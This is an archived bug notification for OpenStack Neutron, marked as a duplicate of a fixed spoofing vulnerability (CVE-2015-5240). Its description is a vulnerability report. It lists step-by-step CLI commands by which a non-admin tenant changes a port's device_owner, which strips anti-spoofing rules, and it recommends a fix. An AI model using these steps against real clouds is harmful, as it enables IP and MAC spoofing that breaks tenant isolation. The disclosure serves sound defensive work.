yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1417791] Re: Neutron allows non-admin user to circumvent port security via port-update device_owner

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Kevin Benton <1417791@xxxxxxxxxxxxxxxxxx>
Date: Thu, 14 Jan 2016 22:14:41 -0000
Reply-to: Bug 1417791 <1417791@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

*** This bug is a duplicate of bug 1489111 ***
    https://bugs.launchpad.net/bugs/1489111

Thanks for filing this. This was actually a vulnerability fixed later in
bug 1489111. I think the part that was overlooked was that this could be
done on shared networks.

** This bug has been marked a duplicate of bug 1489111
   [OSSA 2015-018] IP, MAC, and DHCP spoofing rules can by bypassed by changing device_owner (CVE-2015-5240)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1417791

Title:
  Neutron allows non-admin user to circumvent port security via port-
  update device_owner

Status in neutron:
  New
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Neutron allows a non-admin tenant to circumvent and spoofing port
  security by updating the device-owner to 'network:None' and rebooting
  the instance.

  How to reproduce:

  1. Create a new tenant: `keystone tenant-create --name demo --enable=true`
  2. Create a new user in that tenant: `keystone user-create --name demo --tenant $TENANT_ID --pass $PASSWORD --enabled true`
  3. Switch to that new user: `export OS_USERNAME=demo; export OS_TENANT_NAME=demo; export OS_PASSWORD=$PASSWORD`
  4. Create a keypair: `nova keypair-add demo-key --pub-key ~/.ssh/authorized_keys`
  5. Create a security group: `neutron security-group-create demo-secgroup`
  6. Add a permit rule to that secuirty group: `neutron security-group-rule-create demo-secgroup --remote-ip-prefix 0.0.0.0/0`
  7. Deploy a new instance: `nova boot --flavor m1.tiny --image ubuntu-14.04 --nic net-id=$NETWORK_ID --key-name demo-key --security-groups demo-secgroup --poll demo-instance`
  8. Find the instance's neutron port: `neutron port-list`
  9. Update neutron port device owner: `neutron port-update $PORT_ID --device_owner network:None`
  10. Verify neutron port device owner updated: `neutron port-show $PORT_ID`
  11. Reboot instance: `nova reboot $INSTANCE_ID`

  When the instance comes back up, it will not have anti-spoofing port
  security rules present and can source traffic from any IP and MAC
  combination.

  It doesn't appear like this was intended, in Juno the stock neutron/policy.conf includes:
  ```
      "update_port": "rule:admin_or_owner",
      "update_port:port_security_enabled": "rule:admin_or_network_owner",
  ```

  But the port owner is permitted to modify the device-owner attribute
  of the port which allows circumventing the port security.

  I would recommend protecting the device_owner and device_id port
  attributes so they can only be modified by an admin user.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1417791/+subscriptions